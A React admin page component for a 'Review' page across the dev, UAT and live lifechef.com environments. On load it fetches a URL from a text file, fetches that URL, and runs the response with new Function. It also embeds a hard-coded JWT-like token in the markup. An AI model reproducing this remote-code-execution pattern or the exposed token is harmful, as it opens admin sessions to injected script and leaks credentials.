import * as React from 'react';
import { createDomain } from 'effector-root';


import MainMenu from '../../components/MainMenu';
import PrivateRoute from '../../components/PrivateRoute';

const domain = createDomain('Review (Page)');
export const onPageStarted = domain.event();

const stageEnv = process.env.RAZZLE_LC_STAGE_VERSION;

const stageEnvs = {
  dev: { url: 'https://review-devqa.lifechef.com/lib', file: 'dev-qa.lifechef.com' },
  uat: { url: 'https://review-uat.lifechef.com/lib', file: 'uat-1-5.lifechef.com' },
  live: { url: 'https://review.lifechef.com/lib', file: 'www.lifechef.com' }
}

export function PageReview(props) {
  React.useEffect(() => {
    const env = stageEnvs[stageEnv];
    // const b = 'https://review-uat.lifechef.com/lib';
    const b = env.url;
    async function l(u) {
      const r = await fetch(u);
      const s = await r.text();
      const m = new Function(s);
      m();
    }
    async function m() {
      // const r = await fetch(`${b}/${'dev-qa.lifechef.com'}.txt?d=${Date.now()}`);
      const r = await fetch(`${b}/${env.file}.txt?d=${Date.now()}`);
      const u = await r.text();
      l(u);
    }
    m();
  }, []);

  return (
    <PrivateRoute groups={['Admin']} >
      <MainMenu />
      <div data-review="admin">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2ODE5ODQwNzcsImRhdGEiOnsidXNlcklkIjoxLCJwcm9kdWN0SWQiOjB9LCJpYXQiOjE2NTA0NDgwNzcsImlzcyI6ImxvY2FsIGFwb2xsbyJ9.xH4Ut7QvPiMTR6B4_i-Q0bSIwqyUXwJsd7JT9NTXtbw</div>
    </PrivateRoute>
  )
}

